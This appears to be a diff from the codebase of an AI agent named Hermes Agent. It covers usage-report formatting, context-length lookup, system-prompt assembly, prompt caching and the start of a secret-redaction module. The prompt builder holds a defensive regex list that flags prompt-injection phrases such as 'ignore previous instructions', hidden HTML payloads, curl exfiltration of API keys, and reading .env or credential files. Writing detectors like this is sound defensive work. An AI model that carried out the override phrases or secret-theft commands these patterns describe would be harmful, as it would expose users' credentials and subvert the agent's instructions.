"label": "Longest session",
"session_id": longest["id"][:16],
"value": _format_duration(dur),
"date": datetime.fromtimestamp(longest["started_at"]).strftime("%b %d"),
})
# Most messages
most_msgs = max(sessions, key=lambda s: s.get("message_count") or 0)
if (most_msgs.get("message_count") or 0) > 0:
top.append({
"label": "Most messages",
"session_id": most_msgs["id"][:16],
"value": f"{most_msgs['message_count']} msgs",
"date": datetime.fromtimestamp(most_msgs["started_at"]).strftime("%b %d") if most_msgs.get("started_at") else "?",
})
# Most tokens
most_tokens = max(
sessions,
key=lambda s: (s.get("input_tokens") or 0) + (s.get("output_tokens") or 0),
)
token_total = (most_tokens.get("input_tokens") or 0) + (most_tokens.get("output_tokens") or 0)
if token_total > 0:
top.append({
"label": "Most tokens",
"session_id": most_tokens["id"][:16],
"value": f"{token_total:,} tokens",
"date": datetime.fromtimestamp(most_tokens["started_at"]).strftime("%b %d") if most_tokens.get("started_at") else "?",
})
# Most tool calls
most_tools = max(sessions, key=lambda s: s.get("tool_call_count") or 0)
if (most_tools.get("tool_call_count") or 0) > 0:
top.append({
"label": "Most tool calls",
"session_id": most_tools["id"][:16],
"value": f"{most_tools['tool_call_count']} calls",
"date": datetime.fromtimestamp(most_tools["started_at"]).strftime("%b %d") if most_tools.get("started_at") else "?",
})
return top
# =========================================================================
# Formatting
# =========================================================================
def format_terminal(self, report: Dict) -> str:
"""Format the insights report for terminal display (CLI)."""
if report.get("empty"):
days = report.get("days", 30)
src = f" (source: {report['source_filter']})" if report.get("source_filter") else ""
return f" No sessions found in the last {days} days{src}."
lines = []
o = report["overview"]
days = report["days"]
src_filter = report.get("source_filter")
# Header
lines.append("")
lines.append(" ╔══════════════════════════════════════════════════════════╗")
lines.append(" ║ 📊 Hermes Insights ║")
period_label = f"Last {days} days"
if src_filter:
period_label += f" ({src_filter})"
padding = 58 - len(period_label) - 2
left_pad = padding // 2
right_pad = padding - left_pad
lines.append(f"{' ' * left_pad} {period_label} {' ' * right_pad}")
lines.append(" ╚══════════════════════════════════════════════════════════╝")
lines.append("")
# Date range
if o.get("date_range_start") and o.get("date_range_end"):
start_str = datetime.fromtimestamp(o["date_range_start"]).strftime("%b %d, %Y")
end_str = datetime.fromtimestamp(o["date_range_end"]).strftime("%b %d, %Y")
lines.append(f" Period: {start_str}{end_str}")
lines.append("")
# Overview
lines.append(" 📋 Overview")
lines.append(" " + "" * 56)
lines.append(f" Sessions: {o['total_sessions']:<12} Messages: {o['total_messages']:,}")
lines.append(f" Tool calls: {o['total_tool_calls']:<12,} User messages: {o['user_messages']:,}")
lines.append(f" Input tokens: {o['total_input_tokens']:<12,} Output tokens: {o['total_output_tokens']:,}")
cost_str = f"${o['estimated_cost']:.2f}"
if o.get("models_without_pricing"):
cost_str += " *"
lines.append(f" Total tokens: {o['total_tokens']:<12,} Est. cost: {cost_str}")
if o["total_hours"] > 0:
lines.append(f" Active time: ~{_format_duration(o['total_hours'] * 3600):<11} Avg session: ~{_format_duration(o['avg_session_duration'])}")
lines.append(f" Avg msgs/session: {o['avg_messages_per_session']:.1f}")
lines.append("")
# Model breakdown
if report["models"]:
lines.append(" 🤖 Models Used")
lines.append(" " + "" * 56)
lines.append(f" {'Model':<30} {'Sessions':>8} {'Tokens':>12} {'Cost':>8}")
for m in report["models"]:
model_name = m["model"][:28]
if m.get("has_pricing"):
cost_cell = f"${m['cost']:>6.2f}"
else:
cost_cell = " N/A"
lines.append(f" {model_name:<30} {m['sessions']:>8} {m['total_tokens']:>12,} {cost_cell}")
if o.get("models_without_pricing"):
lines.append(f" * Cost N/A for custom/self-hosted models")
lines.append("")
# Platform breakdown
if len(report["platforms"]) > 1 or (report["platforms"] and report["platforms"][0]["platform"] != "cli"):
lines.append(" 📱 Platforms")
lines.append(" " + "" * 56)
lines.append(f" {'Platform':<14} {'Sessions':>8} {'Messages':>10} {'Tokens':>14}")
for p in report["platforms"]:
lines.append(f" {p['platform']:<14} {p['sessions']:>8} {p['messages']:>10,} {p['total_tokens']:>14,}")
lines.append("")
# Tool usage
if report["tools"]:
lines.append(" 🔧 Top Tools")
lines.append(" " + "" * 56)
lines.append(f" {'Tool':<28} {'Calls':>8} {'%':>8}")
for t in report["tools"][:15]: # Top 15
lines.append(f" {t['tool']:<28} {t['count']:>8,} {t['percentage']:>7.1f}%")
if len(report["tools"]) > 15:
lines.append(f" ... and {len(report['tools']) - 15} more tools")
lines.append("")
# Activity patterns
act = report.get("activity", {})
if act.get("by_day"):
lines.append(" 📅 Activity Patterns")
lines.append(" " + "" * 56)
# Day of week chart
day_values = [d["count"] for d in act["by_day"]]
bars = _bar_chart(day_values, max_width=15)
for i, d in enumerate(act["by_day"]):
bar = bars[i]
lines.append(f" {d['day']} {bar:<15} {d['count']}")
lines.append("")
# Peak hours (show top 5 busiest hours)
busy_hours = sorted(act["by_hour"], key=lambda x: x["count"], reverse=True)
busy_hours = [h for h in busy_hours if h["count"] > 0][:5]
if busy_hours:
hour_strs = []
for h in busy_hours:
hr = h["hour"]
ampm = "AM" if hr < 12 else "PM"
display_hr = hr % 12 or 12
hour_strs.append(f"{display_hr}{ampm} ({h['count']})")
lines.append(f" Peak hours: {', '.join(hour_strs)}")
if act.get("active_days"):
lines.append(f" Active days: {act['active_days']}")
if act.get("max_streak") and act["max_streak"] > 1:
lines.append(f" Best streak: {act['max_streak']} consecutive days")
lines.append("")
# Notable sessions
if report.get("top_sessions"):
lines.append(" 🏆 Notable Sessions")
lines.append(" " + "" * 56)
for ts in report["top_sessions"]:
lines.append(f" {ts['label']:<20} {ts['value']:<18} ({ts['date']}, {ts['session_id']})")
lines.append("")
return "\n".join(lines)
def format_gateway(self, report: Dict) -> str:
"""Format the insights report for gateway/messaging (shorter)."""
if report.get("empty"):
days = report.get("days", 30)
return f"No sessions found in the last {days} days."
lines = []
o = report["overview"]
days = report["days"]
lines.append(f"📊 **Hermes Insights** — Last {days} days\n")
# Overview
lines.append(f"**Sessions:** {o['total_sessions']} | **Messages:** {o['total_messages']:,} | **Tool calls:** {o['total_tool_calls']:,}")
lines.append(f"**Tokens:** {o['total_tokens']:,} (in: {o['total_input_tokens']:,} / out: {o['total_output_tokens']:,})")
cost_note = ""
if o.get("models_without_pricing"):
cost_note = " _(excludes custom/self-hosted models)_"
lines.append(f"**Est. cost:** ${o['estimated_cost']:.2f}{cost_note}")
if o["total_hours"] > 0:
lines.append(f"**Active time:** ~{_format_duration(o['total_hours'] * 3600)} | **Avg session:** ~{_format_duration(o['avg_session_duration'])}")
lines.append("")
# Models (top 5)
if report["models"]:
lines.append("**🤖 Models:**")
for m in report["models"][:5]:
cost_str = f"${m['cost']:.2f}" if m.get("has_pricing") else "N/A"
lines.append(f" {m['model'][:25]}{m['sessions']} sessions, {m['total_tokens']:,} tokens, {cost_str}")
lines.append("")
# Platforms (if multi-platform)
if len(report["platforms"]) > 1:
lines.append("**📱 Platforms:**")
for p in report["platforms"]:
lines.append(f" {p['platform']}{p['sessions']} sessions, {p['messages']:,} msgs")
lines.append("")
# Tools (top 8)
if report["tools"]:
lines.append("**🔧 Top Tools:**")
for t in report["tools"][:8]:
lines.append(f" {t['tool']}{t['count']:,} calls ({t['percentage']:.1f}%)")
lines.append("")
# Activity summary
act = report.get("activity", {})
if act.get("busiest_day") and act.get("busiest_hour"):
hr = act["busiest_hour"]["hour"]
ampm = "AM" if hr < 12 else "PM"
display_hr = hr % 12 or 12
lines.append(f"**📅 Busiest:** {act['busiest_day']['day']}s ({act['busiest_day']['count']} sessions), {display_hr}{ampm} ({act['busiest_hour']['count']} sessions)")
if act.get("active_days"):
lines.append(f"**Active days:** {act['active_days']}", )
if act.get("max_streak", 0) > 1:
lines.append(f"**Best streak:** {act['max_streak']} consecutive days")
return "\n".join(lines)

235
agent/model_metadata.py Normal file
View File

@@ -0,0 +1,235 @@
"""Model metadata, context lengths, and token estimation utilities.
Pure utility functions with no AIAgent dependency. Used by ContextCompressor
and run_agent.py for pre-flight context checks.
"""
import logging
import os
import re
import time
from pathlib import Path
from typing import Any, Dict, List, Optional
import requests
import yaml
from hermes_constants import OPENROUTER_MODELS_URL
logger = logging.getLogger(__name__)
_model_metadata_cache: Dict[str, Dict[str, Any]] = {}
_model_metadata_cache_time: float = 0
_MODEL_CACHE_TTL = 3600
# Descending tiers for context length probing when the model is unknown.
# We start high and step down on context-length errors until one works.
CONTEXT_PROBE_TIERS = [
2_000_000,
1_000_000,
512_000,
200_000,
128_000,
64_000,
32_000,
]
DEFAULT_CONTEXT_LENGTHS = {
"anthropic/claude-opus-4": 200000,
"anthropic/claude-opus-4.5": 200000,
"anthropic/claude-opus-4.6": 200000,
"anthropic/claude-sonnet-4": 200000,
"anthropic/claude-sonnet-4-20250514": 200000,
"anthropic/claude-haiku-4.5": 200000,
# Bare Anthropic model IDs (for native API provider)
"claude-opus-4-6": 200000,
"claude-sonnet-4-6": 200000,
"claude-opus-4-5-20251101": 200000,
"claude-sonnet-4-5-20250929": 200000,
"claude-opus-4-1-20250805": 200000,
"claude-opus-4-20250514": 200000,
"claude-sonnet-4-20250514": 200000,
"claude-haiku-4-5-20251001": 200000,
"openai/gpt-4o": 128000,
"openai/gpt-4-turbo": 128000,
"openai/gpt-4o-mini": 128000,
"google/gemini-2.0-flash": 1048576,
"google/gemini-2.5-pro": 1048576,
"meta-llama/llama-3.3-70b-instruct": 131072,
"deepseek/deepseek-chat-v3": 65536,
"qwen/qwen-2.5-72b-instruct": 32768,
"glm-4.7": 202752,
"glm-5": 202752,
"glm-4.5": 131072,
"glm-4.5-flash": 131072,
"kimi-for-coding": 262144,
"kimi-k2.5": 262144,
"kimi-k2-thinking": 262144,
"kimi-k2-thinking-turbo": 262144,
"kimi-k2-turbo-preview": 262144,
"kimi-k2-0905-preview": 131072,
"MiniMax-M2.5": 204800,
"MiniMax-M2.5-highspeed": 204800,
"MiniMax-M2.1": 204800,
}
def fetch_model_metadata(force_refresh: bool = False) -> Dict[str, Dict[str, Any]]:
"""Fetch model metadata from OpenRouter (cached for 1 hour)."""
global _model_metadata_cache, _model_metadata_cache_time
if not force_refresh and _model_metadata_cache and (time.time() - _model_metadata_cache_time) < _MODEL_CACHE_TTL:
return _model_metadata_cache
try:
response = requests.get(OPENROUTER_MODELS_URL, timeout=10)
response.raise_for_status()
data = response.json()
cache = {}
for model in data.get("data", []):
model_id = model.get("id", "")
cache[model_id] = {
"context_length": model.get("context_length", 128000),
"max_completion_tokens": model.get("top_provider", {}).get("max_completion_tokens", 4096),
"name": model.get("name", model_id),
"pricing": model.get("pricing", {}),
}
canonical = model.get("canonical_slug", "")
if canonical and canonical != model_id:
cache[canonical] = cache[model_id]
_model_metadata_cache = cache
_model_metadata_cache_time = time.time()
logger.debug("Fetched metadata for %s models from OpenRouter", len(cache))
return cache
except Exception as e:
logging.warning(f"Failed to fetch model metadata from OpenRouter: {e}")
return _model_metadata_cache or {}
def _get_context_cache_path() -> Path:
"""Return path to the persistent context length cache file."""
hermes_home = Path(os.environ.get("HERMES_HOME", Path.home() / ".hermes"))
return hermes_home / "context_length_cache.yaml"
def _load_context_cache() -> Dict[str, int]:
"""Load the model+provider → context_length cache from disk."""
path = _get_context_cache_path()
if not path.exists():
return {}
try:
with open(path) as f:
data = yaml.safe_load(f) or {}
return data.get("context_lengths", {})
except Exception as e:
logger.debug("Failed to load context length cache: %s", e)
return {}
def save_context_length(model: str, base_url: str, length: int) -> None:
"""Persist a discovered context length for a model+provider combo.
Cache key is ``model@base_url`` so the same model name served from
different providers can have different limits.
"""
key = f"{model}@{base_url}"
cache = _load_context_cache()
if cache.get(key) == length:
return # already stored
cache[key] = length
path = _get_context_cache_path()
try:
path.parent.mkdir(parents=True, exist_ok=True)
with open(path, "w") as f:
yaml.dump({"context_lengths": cache}, f, default_flow_style=False)
logger.info("Cached context length %s%s tokens", key, f"{length:,}")
except Exception as e:
logger.debug("Failed to save context length cache: %s", e)
def get_cached_context_length(model: str, base_url: str) -> Optional[int]:
"""Look up a previously discovered context length for model+provider."""
key = f"{model}@{base_url}"
cache = _load_context_cache()
return cache.get(key)
def get_next_probe_tier(current_length: int) -> Optional[int]:
"""Return the next lower probe tier, or None if already at minimum."""
for tier in CONTEXT_PROBE_TIERS:
if tier < current_length:
return tier
return None
def parse_context_limit_from_error(error_msg: str) -> Optional[int]:
"""Try to extract the actual context limit from an API error message.
Many providers include the limit in their error text, e.g.:
- "maximum context length is 32768 tokens"
- "context_length_exceeded: 131072"
- "Maximum context size 32768 exceeded"
- "model's max context length is 65536"
"""
error_lower = error_msg.lower()
# Pattern: look for numbers near context-related keywords
patterns = [
r'(?:max(?:imum)?|limit)\s*(?:context\s*)?(?:length|size|window)?\s*(?:is|of|:)?\s*(\d{4,})',
r'context\s*(?:length|size|window)\s*(?:is|of|:)?\s*(\d{4,})',
r'(\d{4,})\s*(?:token)?\s*(?:context|limit)',
r'>\s*(\d{4,})\s*(?:max|limit|token)', # "250000 tokens > 200000 maximum"
r'(\d{4,})\s*(?:max(?:imum)?)\b', # "200000 maximum"
]
for pattern in patterns:
match = re.search(pattern, error_lower)
if match:
limit = int(match.group(1))
# Sanity check: must be a reasonable context length
if 1024 <= limit <= 10_000_000:
return limit
return None
def get_model_context_length(model: str, base_url: str = "") -> int:
"""Get the context length for a model.
Resolution order:
1. Persistent cache (previously discovered via probing)
2. OpenRouter API metadata
3. Hardcoded DEFAULT_CONTEXT_LENGTHS (fuzzy match)
4. First probe tier (2M) — will be narrowed on first context error
"""
# 1. Check persistent cache (model+provider)
if base_url:
cached = get_cached_context_length(model, base_url)
if cached is not None:
return cached
# 2. OpenRouter API metadata
metadata = fetch_model_metadata()
if model in metadata:
return metadata[model].get("context_length", 128000)
# 3. Hardcoded defaults (fuzzy match)
for default_model, length in DEFAULT_CONTEXT_LENGTHS.items():
if default_model in model or model in default_model:
return length
# 4. Unknown model — start at highest probe tier
return CONTEXT_PROBE_TIERS[0]
def estimate_tokens_rough(text: str) -> int:
"""Rough token estimate (~4 chars/token) for pre-flight checks."""
if not text:
return 0
return len(text) // 4
def estimate_messages_tokens_rough(messages: List[Dict[str, Any]]) -> int:
"""Rough token estimate for a message list (pre-flight only)."""
total_chars = sum(len(str(msg)) for msg in messages)
return total_chars // 4

443
agent/prompt_builder.py Normal file
View File

@@ -0,0 +1,443 @@
"""System prompt assembly -- identity, platform hints, skills index, context files.
All functions are stateless. AIAgent._build_system_prompt() calls these to
assemble pieces, then combines them with memory and ephemeral prompts.
"""
import logging
import os
import re
from pathlib import Path
from typing import Optional
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Context file scanning — detect prompt injection in AGENTS.md, .cursorrules,
# SOUL.md before they get injected into the system prompt.
# ---------------------------------------------------------------------------
_CONTEXT_THREAT_PATTERNS = [
(r'ignore\s+(previous|all|above|prior)\s+instructions', "prompt_injection"),
(r'do\s+not\s+tell\s+the\s+user', "deception_hide"),
(r'system\s+prompt\s+override', "sys_prompt_override"),
(r'disregard\s+(your|all|any)\s+(instructions|rules|guidelines)', "disregard_rules"),
(r'act\s+as\s+(if|though)\s+you\s+(have\s+no|don\'t\s+have)\s+(restrictions|limits|rules)', "bypass_restrictions"),
(r'<!--[^>]*(?:ignore|override|system|secret|hidden)[^>]*-->', "html_comment_injection"),
(r'<\s*div\s+style\s*=\s*["\'].*display\s*:\s*none', "hidden_div"),
(r'translate\s+.*\s+into\s+.*\s+and\s+(execute|run|eval)', "translate_execute"),
(r'curl\s+[^\n]*\$\{?\w*(KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL|API)', "exfil_curl"),
(r'cat\s+[^\n]*(\.env|credentials|\.netrc|\.pgpass)', "read_secrets"),
]
_CONTEXT_INVISIBLE_CHARS = {
'\u200b', '\u200c', '\u200d', '\u2060', '\ufeff',
'\u202a', '\u202b', '\u202c', '\u202d', '\u202e',
}
def _scan_context_content(content: str, filename: str) -> str:
"""Scan context file content for injection. Returns sanitized content."""
findings = []
# Check invisible unicode
for char in _CONTEXT_INVISIBLE_CHARS:
if char in content:
findings.append(f"invisible unicode U+{ord(char):04X}")
# Check threat patterns
for pattern, pid in _CONTEXT_THREAT_PATTERNS:
if re.search(pattern, content, re.IGNORECASE):
findings.append(pid)
if findings:
logger.warning("Context file %s blocked: %s", filename, ", ".join(findings))
return f"[BLOCKED: {filename} contained potential prompt injection ({', '.join(findings)}). Content not loaded.]"
return content
# =========================================================================
# Constants
# =========================================================================
DEFAULT_AGENT_IDENTITY = (
"You are Hermes Agent, an intelligent AI assistant created by Nous Research. "
"You are helpful, knowledgeable, and direct. You assist users with a wide "
"range of tasks including answering questions, writing and editing code, "
"analyzing information, creative work, and executing actions via your tools. "
"You communicate clearly, admit uncertainty when appropriate, and prioritize "
"being genuinely useful over being verbose unless otherwise directed below. "
"Be targeted and efficient in your exploration and investigations."
)
MEMORY_GUIDANCE = (
"You have persistent memory across sessions. Proactively save important things "
"you learn (user preferences, environment details, useful approaches) and do "
"(like a diary!) using the memory tool -- don't wait to be asked."
)
SESSION_SEARCH_GUIDANCE = (
"When the user references something from a past conversation or you suspect "
"relevant prior context exists, use session_search to recall it before asking "
"them to repeat themselves."
)
SKILLS_GUIDANCE = (
"After completing a complex task (5+ tool calls), fixing a tricky error, "
"or discovering a non-trivial workflow, consider saving the approach as a "
"skill with skill_manage so you can reuse it next time."
)
PLATFORM_HINTS = {
"whatsapp": (
"You are on a text messaging communication platform, WhatsApp. "
"Please do not use markdown as it does not render. "
"You can send media files natively: to deliver a file to the user, "
"include MEDIA:/absolute/path/to/file in your response. The file "
"will be sent as a native WhatsApp attachment — images (.jpg, .png, "
".webp) appear as photos, videos (.mp4, .mov) play inline, and other "
"files arrive as downloadable documents. You can also include image "
"URLs in markdown format ![alt](url) and they will be sent as photos."
),
"telegram": (
"You are on a text messaging communication platform, Telegram. "
"Please do not use markdown as it does not render. "
"You can send media files natively: to deliver a file to the user, "
"include MEDIA:/absolute/path/to/file in your response. Images "
"(.png, .jpg, .webp) appear as photos, audio (.ogg) sends as voice "
"bubbles, and videos (.mp4) play inline. You can also include image "
"URLs in markdown format ![alt](url) and they will be sent as native photos."
),
"discord": (
"You are in a Discord server or group chat communicating with your user. "
"You can send media files natively: include MEDIA:/absolute/path/to/file "
"in your response. Images (.png, .jpg, .webp) are sent as photo "
"attachments, audio as file attachments. You can also include image URLs "
"in markdown format ![alt](url) and they will be sent as attachments."
),
"slack": (
"You are in a Slack workspace communicating with your user. "
"You can send media files natively: include MEDIA:/absolute/path/to/file "
"in your response. Images (.png, .jpg, .webp) are uploaded as photo "
"attachments, audio as file attachments. You can also include image URLs "
"in markdown format ![alt](url) and they will be uploaded as attachments."
),
"signal": (
"You are on a text messaging communication platform, Signal. "
"Please do not use markdown as it does not render. "
"You can send media files natively: to deliver a file to the user, "
"include MEDIA:/absolute/path/to/file in your response. Images "
"(.png, .jpg, .webp) appear as photos, audio as attachments, and other "
"files arrive as downloadable documents. You can also include image "
"URLs in markdown format ![alt](url) and they will be sent as photos."
),
"email": (
"You are communicating via email. Write clear, well-structured responses "
"suitable for email. Use plain text formatting (no markdown). "
"Keep responses concise but complete. You can send file attachments — "
"include MEDIA:/absolute/path/to/file in your response. The subject line "
"is preserved for threading. Do not include greetings or sign-offs unless "
"contextually appropriate."
),
"cli": (
"You are a CLI AI Agent. Try not to use markdown but simple text "
"renderable inside a terminal."
),
}
CONTEXT_FILE_MAX_CHARS = 20_000
CONTEXT_TRUNCATE_HEAD_RATIO = 0.7
CONTEXT_TRUNCATE_TAIL_RATIO = 0.2
# =========================================================================
# Skills index
# =========================================================================
def _parse_skill_file(skill_file: Path) -> tuple[bool, dict, str]:
"""Read a SKILL.md once and return platform compatibility, frontmatter, and description.
Returns (is_compatible, frontmatter, description). On any error, returns
(True, {}, "") to err on the side of showing the skill.
"""
try:
from tools.skills_tool import _parse_frontmatter, skill_matches_platform
raw = skill_file.read_text(encoding="utf-8")[:2000]
frontmatter, _ = _parse_frontmatter(raw)
if not skill_matches_platform(frontmatter):
return False, {}, ""
desc = ""
raw_desc = frontmatter.get("description", "")
if raw_desc:
desc = str(raw_desc).strip().strip("'\"")
if len(desc) > 60:
desc = desc[:57] + "..."
return True, frontmatter, desc
except Exception:
return True, {}, ""
def _read_skill_conditions(skill_file: Path) -> dict:
"""Extract conditional activation fields from SKILL.md frontmatter."""
try:
from tools.skills_tool import _parse_frontmatter
raw = skill_file.read_text(encoding="utf-8")[:2000]
frontmatter, _ = _parse_frontmatter(raw)
hermes = frontmatter.get("metadata", {}).get("hermes", {})
return {
"fallback_for_toolsets": hermes.get("fallback_for_toolsets", []),
"requires_toolsets": hermes.get("requires_toolsets", []),
"fallback_for_tools": hermes.get("fallback_for_tools", []),
"requires_tools": hermes.get("requires_tools", []),
}
except Exception:
return {}
def _skill_should_show(
conditions: dict,
available_tools: "set[str] | None",
available_toolsets: "set[str] | None",
) -> bool:
"""Return False if the skill's conditional activation rules exclude it."""
if available_tools is None and available_toolsets is None:
return True # No filtering info — show everything (backward compat)
at = available_tools or set()
ats = available_toolsets or set()
# fallback_for: hide when the primary tool/toolset IS available
for ts in conditions.get("fallback_for_toolsets", []):
if ts in ats:
return False
for t in conditions.get("fallback_for_tools", []):
if t in at:
return False
# requires: hide when a required tool/toolset is NOT available
for ts in conditions.get("requires_toolsets", []):
if ts not in ats:
return False
for t in conditions.get("requires_tools", []):
if t not in at:
return False
return True
def build_skills_system_prompt(
available_tools: "set[str] | None" = None,
available_toolsets: "set[str] | None" = None,
) -> str:
"""Build a compact skill index for the system prompt.
Scans ~/.hermes/skills/ for SKILL.md files grouped by category.
Includes per-skill descriptions from frontmatter so the model can
match skills by meaning, not just name.
Filters out skills incompatible with the current OS platform.
"""
hermes_home = Path(os.getenv("HERMES_HOME", Path.home() / ".hermes"))
skills_dir = hermes_home / "skills"
if not skills_dir.exists():
return ""
# Collect skills with descriptions, grouped by category.
# Each entry: (skill_name, description)
# Supports sub-categories: skills/mlops/training/axolotl/SKILL.md
# -> category "mlops/training", skill "axolotl"
skills_by_category: dict[str, list[tuple[str, str]]] = {}
for skill_file in skills_dir.rglob("SKILL.md"):
is_compatible, _, desc = _parse_skill_file(skill_file)
if not is_compatible:
continue
# Skip skills whose conditional activation rules exclude them
conditions = _read_skill_conditions(skill_file)
if not _skill_should_show(conditions, available_tools, available_toolsets):
continue
rel_path = skill_file.relative_to(skills_dir)
parts = rel_path.parts
if len(parts) >= 2:
# Category is everything between skills_dir and the skill folder
# e.g. parts = ("mlops", "training", "axolotl", "SKILL.md")
# → category = "mlops/training", skill_name = "axolotl"
# e.g. parts = ("github", "github-auth", "SKILL.md")
# → category = "github", skill_name = "github-auth"
skill_name = parts[-2]
category = "/".join(parts[:-2]) if len(parts) > 2 else parts[0]
else:
category = "general"
skill_name = skill_file.parent.name
skills_by_category.setdefault(category, []).append((skill_name, desc))
if not skills_by_category:
return ""
# Read category-level descriptions from DESCRIPTION.md
# Checks both the exact category path and parent directories
category_descriptions = {}
for category in skills_by_category:
cat_path = Path(category)
desc_file = skills_dir / cat_path / "DESCRIPTION.md"
if desc_file.exists():
try:
content = desc_file.read_text(encoding="utf-8")
match = re.search(r"^---\s*\n.*?description:\s*(.+?)\s*\n.*?^---", content, re.MULTILINE | re.DOTALL)
if match:
category_descriptions[category] = match.group(1).strip()
except Exception as e:
logger.debug("Could not read skill description %s: %s", desc_file, e)
index_lines = []
for category in sorted(skills_by_category.keys()):
cat_desc = category_descriptions.get(category, "")
if cat_desc:
index_lines.append(f" {category}: {cat_desc}")
else:
index_lines.append(f" {category}:")
# Deduplicate and sort skills within each category
seen = set()
for name, desc in sorted(skills_by_category[category], key=lambda x: x[0]):
if name in seen:
continue
seen.add(name)
if desc:
index_lines.append(f" - {name}: {desc}")
else:
index_lines.append(f" - {name}")
return (
"## Skills (mandatory)\n"
"Before replying, scan the skills below. If one clearly matches your task, "
"load it with skill_view(name) and follow its instructions. "
"If a skill has issues, fix it with skill_manage(action='patch').\n"
"\n"
"<available_skills>\n"
+ "\n".join(index_lines) + "\n"
"</available_skills>\n"
"\n"
"If none match, proceed normally without loading a skill."
)
# =========================================================================
# Context files (SOUL.md, AGENTS.md, .cursorrules)
# =========================================================================
def _truncate_content(content: str, filename: str, max_chars: int = CONTEXT_FILE_MAX_CHARS) -> str:
"""Head/tail truncation with a marker in the middle."""
if len(content) <= max_chars:
return content
head_chars = int(max_chars * CONTEXT_TRUNCATE_HEAD_RATIO)
tail_chars = int(max_chars * CONTEXT_TRUNCATE_TAIL_RATIO)
head = content[:head_chars]
tail = content[-tail_chars:]
marker = f"\n\n[...truncated {filename}: kept {head_chars}+{tail_chars} of {len(content)} chars. Use file tools to read the full file.]\n\n"
return head + marker + tail
def build_context_files_prompt(cwd: Optional[str] = None) -> str:
"""Discover and load context files for the system prompt.
Discovery: AGENTS.md (recursive), .cursorrules / .cursor/rules/*.mdc,
SOUL.md (cwd then ~/.hermes/ fallback). Each capped at 20,000 chars.
"""
if cwd is None:
cwd = os.getcwd()
cwd_path = Path(cwd).resolve()
sections = []
# AGENTS.md (hierarchical, recursive)
top_level_agents = None
for name in ["AGENTS.md", "agents.md"]:
candidate = cwd_path / name
if candidate.exists():
top_level_agents = candidate
break
if top_level_agents:
agents_files = []
for root, dirs, files in os.walk(cwd_path):
dirs[:] = [d for d in dirs if not d.startswith('.') and d not in ('node_modules', '__pycache__', 'venv', '.venv')]
for f in files:
if f.lower() == "agents.md":
agents_files.append(Path(root) / f)
agents_files.sort(key=lambda p: len(p.parts))
total_agents_content = ""
for agents_path in agents_files:
try:
content = agents_path.read_text(encoding="utf-8").strip()
if content:
rel_path = agents_path.relative_to(cwd_path)
content = _scan_context_content(content, str(rel_path))
total_agents_content += f"## {rel_path}\n\n{content}\n\n"
except Exception as e:
logger.debug("Could not read %s: %s", agents_path, e)
if total_agents_content:
total_agents_content = _truncate_content(total_agents_content, "AGENTS.md")
sections.append(total_agents_content)
# .cursorrules
cursorrules_content = ""
cursorrules_file = cwd_path / ".cursorrules"
if cursorrules_file.exists():
try:
content = cursorrules_file.read_text(encoding="utf-8").strip()
if content:
content = _scan_context_content(content, ".cursorrules")
cursorrules_content += f"## .cursorrules\n\n{content}\n\n"
except Exception as e:
logger.debug("Could not read .cursorrules: %s", e)
cursor_rules_dir = cwd_path / ".cursor" / "rules"
if cursor_rules_dir.exists() and cursor_rules_dir.is_dir():
mdc_files = sorted(cursor_rules_dir.glob("*.mdc"))
for mdc_file in mdc_files:
try:
content = mdc_file.read_text(encoding="utf-8").strip()
if content:
content = _scan_context_content(content, f".cursor/rules/{mdc_file.name}")
cursorrules_content += f"## .cursor/rules/{mdc_file.name}\n\n{content}\n\n"
except Exception as e:
logger.debug("Could not read %s: %s", mdc_file, e)
if cursorrules_content:
cursorrules_content = _truncate_content(cursorrules_content, ".cursorrules")
sections.append(cursorrules_content)
# SOUL.md (cwd first, then ~/.hermes/ fallback)
soul_path = None
for name in ["SOUL.md", "soul.md"]:
candidate = cwd_path / name
if candidate.exists():
soul_path = candidate
break
if not soul_path:
global_soul = Path.home() / ".hermes" / "SOUL.md"
if global_soul.exists():
soul_path = global_soul
if soul_path:
try:
content = soul_path.read_text(encoding="utf-8").strip()
if content:
content = _scan_context_content(content, "SOUL.md")
content = _truncate_content(content, "SOUL.md")
sections.append(
f"## SOUL.md\n\nIf SOUL.md is present, embody its persona and tone. "
f"Avoid stiff, generic replies; follow its guidance unless higher-priority "
f"instructions override it.\n\n{content}"
)
except Exception as e:
logger.debug("Could not read SOUL.md from %s: %s", soul_path, e)
if not sections:
return ""
return "# Project Context\n\nThe following project context files have been loaded and should be followed:\n\n" + "\n".join(sections)

68
agent/prompt_caching.py Normal file
View File

@@ -0,0 +1,68 @@
"""Anthropic prompt caching (system_and_3 strategy).
Reduces input token costs by ~75% on multi-turn conversations by caching
the conversation prefix. Uses 4 cache_control breakpoints (Anthropic max):
1. System prompt (stable across all turns)
2-4. Last 3 non-system messages (rolling window)
Pure functions -- no class state, no AIAgent dependency.
"""
import copy
from typing import Any, Dict, List
def _apply_cache_marker(msg: dict, cache_marker: dict) -> None:
"""Add cache_control to a single message, handling all format variations."""
role = msg.get("role", "")
content = msg.get("content")
if role == "tool":
msg["cache_control"] = cache_marker
return
if content is None:
msg["cache_control"] = cache_marker
return
if isinstance(content, str):
msg["content"] = [{"type": "text", "text": content, "cache_control": cache_marker}]
return
if isinstance(content, list) and content:
last = content[-1]
if isinstance(last, dict):
last["cache_control"] = cache_marker
def apply_anthropic_cache_control(
api_messages: List[Dict[str, Any]],
cache_ttl: str = "5m",
) -> List[Dict[str, Any]]:
"""Apply system_and_3 caching strategy to messages for Anthropic models.
Places up to 4 cache_control breakpoints: system prompt + last 3 non-system messages.
Returns:
Deep copy of messages with cache_control breakpoints injected.
"""
messages = copy.deepcopy(api_messages)
if not messages:
return messages
marker = {"type": "ephemeral"}
if cache_ttl == "1h":
marker["ttl"] = "1h"
breakpoints_used = 0
if messages[0].get("role") == "system":
_apply_cache_marker(messages[0], marker)
breakpoints_used += 1
remaining = 4 - breakpoints_used
non_sys = [i for i in range(len(messages)) if messages[i].get("role") != "system"]
for idx in non_sys[-remaining:]:
_apply_cache_marker(messages[idx], marker)
return messages

161
agent/redact.py Normal file
View File

@@ -0,0 +1,161 @@
"""Regex-based secret redaction for logs and tool output.
Applies pattern matching to mask API keys, tokens, and credentials
before they reach log files, verbose output, or gateway logs.
Short tokens (< 18 chars) are fully masked. Longer tokens preserve
the first 6 and last 4 characters for debuggability.
"""
import logging
import os
import re
logger = logging.getLogger(__name__)
# Known API key prefixes -- match the prefix + contiguous token chars
_PREFIX_PATTERNS = [
